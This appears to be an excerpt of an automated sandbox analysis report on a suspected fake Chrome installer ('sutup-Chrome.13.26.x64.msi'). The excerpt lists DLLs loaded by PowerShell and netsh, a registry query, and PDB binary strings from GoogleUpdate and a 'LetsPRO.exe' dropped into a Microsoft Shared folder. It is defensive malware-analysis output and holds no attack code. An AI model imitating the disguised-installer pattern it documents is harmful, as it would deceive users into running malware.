Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: sutup-Chrome.13.26.x64.msi Static file information: File size 16345600 > 1048576
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe File opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\MSVCR100.dll Jump to behavior
Source: Binary string: GoogleUpdateCore_unsigned.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
Source: Binary string: TEST_goopdateres_unsigned_fa.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115530845.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fa.dll.16.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*L source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .\Device\HarddiskVolume3 Settings\Temp\Symbols\winload_prod.pdb\*.*.*er Data\GraphiteDawnCache\LetsPRO.exeRO.exexeeS/- source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_lt.pdb source: goopdateres_lt.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_el.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112233722.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_mr.pdb source: goopdateres_mr.dll.16.dr
Source: Binary string: cation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDB source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_bg.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108636154.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bg.dll.30.dr, goopdateres_bg.dll.16.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*@ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ar.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108359018.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ar.dll.16.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb@ source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
Source: Binary string: TEST_goopdateres_unsigned_de.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111761457.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_gu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117478429.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_gu.dll.16.dr
Source: Binary string: TEST_mi_exe_stub.pdb source: ChromeSetup.exe, 00000010.00000002.3261124780.0000000000029000.00000002.00000001.01000000.00000005.sdmp, ChromeSetup.exe, 00000010.00000000.2019739468.0000000000029000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2{ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\" source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_psmachine_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_es-419.pdb source: GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114195324.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es-419.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_sl.pdb source: goopdateres_sl.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_pl.pdb source: goopdateres_pl.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_is.pdb source: GoogleUpdate.exe, 0000001E.00000003.2121928783.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_is.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_th.pdb source: goopdateres_th.dll.30.dr
Source: Binary string: GoogleCrashHandler_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_bn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110156700.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bn.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_en.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112625418.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ko.pdb source: GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2133014724.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ko.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_zh-TW.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008BF000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ca.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110803785.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleUpdate_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, GoogleUpdate.exe, 0000001E.00000002.3261001713.0000000000121000.00000020.00000001.01000000.00000008.sdmp, GoogleUpdate.exe.30.dr, GoogleUpdate.exe.16.dr
Source: Binary string: GoogleUpdateBroker_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169122915.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateBroker.exe.16.dr, GoogleUpdateBroker.exe.30.dr
Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: LetsPRO.exe, 00000008.00000002.2082649111.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000008.00000000.2016836584.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000002.2085508018.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000000.2017338659.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000002.2085509347.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000000.2017352894.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000000.2017959585.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000002.2081423718.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000002.2179702546.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000000.2021432146.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000000.2030073468.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000002.2096564571.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000002.2101128457.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000000.2028409698.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000002.2090627708.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000000.2028772226.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000000.2028783611.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000002.2090626641.000000000026D000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056h& source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_pt-PT.pdb source: goopdateres_pt-PT.dll.16.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_am.pdb source: GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108069440.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_am.dll.30.dr
Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleCrashHandler_unsigned.pdbp source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
